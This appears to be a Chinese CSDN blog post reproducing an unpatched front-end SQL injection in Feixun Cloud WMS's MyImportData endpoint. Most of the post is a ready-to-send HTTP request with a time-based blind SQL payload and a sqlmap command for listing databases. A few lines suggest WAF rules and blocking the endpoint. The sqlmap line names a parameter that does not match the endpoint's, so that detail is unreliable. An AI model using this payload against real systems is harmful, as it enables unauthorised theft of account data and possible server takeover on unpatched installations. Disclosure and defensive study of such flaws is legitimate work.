【飞讯云MyImportData前台SQL注入已复现】

已于 2024-07-30 13:08:39 修改
阅读量210 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
于 2024-07-30 13:07:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55213436/article/details/140793966
版权

一、漏洞简介

飞讯云-WMS 接口:/MyDown/MyImportData?opeid=1处存在前台SQL注入漏洞,攻击者可以通过sql注入攻击获取到敏感数据,账号信息等,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、poc利用

GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:10'-- HTTP/1.1
Host: {host}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: language=zh-CN; ASP.NET_SessionId=fszg0ra1zc3tgeepea3p4ujz
Connection: close

sqlmap验证:

python sqlmap.py -u http://xxxx.xxx.xxx:8080/MyDown/MyImportData?opeid=1 -p openid --dbs

三、临时措施

厂商未发布补丁,建议:

1、waf设置规则防护

2、禁止对/MyDown/MyImportData?opeid=1接口的访问

网安第一深禽
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
飞讯云-WMS /MyDown/MyImportData 前台SQL注入漏洞复现(XVE-2024-18113)
0xSec
07-25 2048
飞讯云-WMS /MyDown/MyImportData 接口处存在前台SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【攻防演练】【含poc和修复建议】飞讯云 WMS /MyDown/MyImportData 前台SQL注入
zzxx191z的博客
07-26 251
使用防护类设备进行防护,限制访问/MyDown/MyImportData路径,拦截请求中出。opeid参数存在sql注入。现的恶意 SQL语句。
「漏洞复现飞讯云-WMS /MyDown/MyImportData 前台SQL注入漏洞(XVE-2024-18113)
qq_39894062的博客
07-30 418
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
泛微e-cology9接口services前台SQL注入漏洞
weixin_43167326的博客
07-25 589
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
飞讯管理员端签到部分设计
qq_46025739的博客
06-02 269
飞讯签到部分
飞讯管理员端的问卷方面功能
qq_46025739的博客
05-25 249
数据库方面设计 问卷主体表: varchar questionnaireId 自增主键,问卷的唯一标识 varchar userid 发布问卷的用户 varchar name 问卷名称 varchar createTime 问卷创建时间 varchar startTime 问卷开始时间 varchar endTime 问卷结束时间 varchar state 问卷状态,分为暂存,发布,删除三种状态 int count 问卷被完成的次数 问题表 varchar qu...
科达飞讯SDK出现 20021,引擎错误
心有猛虎 细嗅蔷薇
09-27 508
tomcat容器中调用科达飞讯语义识别报20021,引擎错误,是因为工程依赖的包libmsc32.so和msc32.dll没有正常加载 windows可以放到tomcat bin目录下 linux 32位可以放到依赖的jre /lib/amd32 linux64位可以放到依赖的jre /lib/amd64 --------------------- 本文来自 mazi2004 的CSDN ...
科大飞讯语音引擎TTS+静读天下专业版1.41已付费版
04-06
《科大飞讯语音引擎TTS+静读天下专业版1.41已付费版》是一款结合了科大飞讯的语音合成技术(TTS)与静读天下专业阅读器的软件产品。这款软件集成了高质量的语音合成功能,为用户提供便捷、自然的听书体验。以下是...
qq批量登陆 飞讯QQ批量登陆挂机工具 v3.9
11-09
在实际应用中,飞讯QQ批量登陆挂机工具v3.9能广泛应用于各种QQ营销场景,如社群管理、消息推送、广告推广等。通过提高账号的活跃度和权重,可以增加被目标用户发现的概率,提高营销效果。此外,对于一些需要多账号...
易语言源码易语言飞讯格式转换源码.rar
02-22
易语言源码易语言飞讯格式转换源码.rar 易语言源码易语言飞讯格式转换源码.rar 易语言源码易语言飞讯格式转换源码.rar 易语言源码易语言飞讯格式转换源码.rar 易语言源码易语言飞讯格式转换源码.rar 易语言源码...
金飞讯野狼版写频软件
10-07
金飞讯野狼版写频软件是一款专为金飞讯野狼版对讲机设计的配置工具,主要用于调整和设置对讲机的各种参数,确保设备能够根据用户需求进行有效通信。这款软件的核心功能是帮助用户对对讲机的频率、功率、扫描列表等...
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 277
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
数据传输安全——混合加解密(国密)
SheldonChang的博客
09-03 1543
SM2:这是一种基于椭圆曲线密码学(ECC)的非对称加密算法,主要用于数字签名和密钥交换。它提供了一种安全的方式用于保护信息的完整性和机密性。SM4:这是一种对称加密算法,类似于AES,但它使用128位的密钥长度来加密数据。SM4在对称加密中提供了快速的数据加密能力。本文介绍了如何使用Java实现基于国密标准的SM2与SM4混合加密解密工具类。通过这种混合加密方式,可以在保证数据安全的同时,也考虑到了加密解密过程的效率问题。随着国密算法的广泛应用,这类工具将会在越来越多的应用场景中发挥重要作用。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 766
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
海外直播对网速、带宽、安全的要求
TIANGEKUAJING的博客
09-03 287
要满足海外直播的要求,需要拥有合适的网络配置。在全球化的浪潮下,海外直播正逐渐成为企业、个人和各类组织的重要工具。不论是用于市场推广、品牌宣传,还是与观众互动,海外直播都为参与者带来了丰富的机会。然而,确保高质量的直播效果,必须满足特定的网络条件。
Java安全-动态加载字节码
最新发布
柠檬i的博客
09-07 674
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
【中国国际航空-注册/登录安全分析报告】
09-07 766
中国国际航空公司联合中国航空总公司和中国西南航空公司,成立了中国航空集团公司,作为航空领域的翘楚,依托国有资源,技术实力雄厚, 人才济济,在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值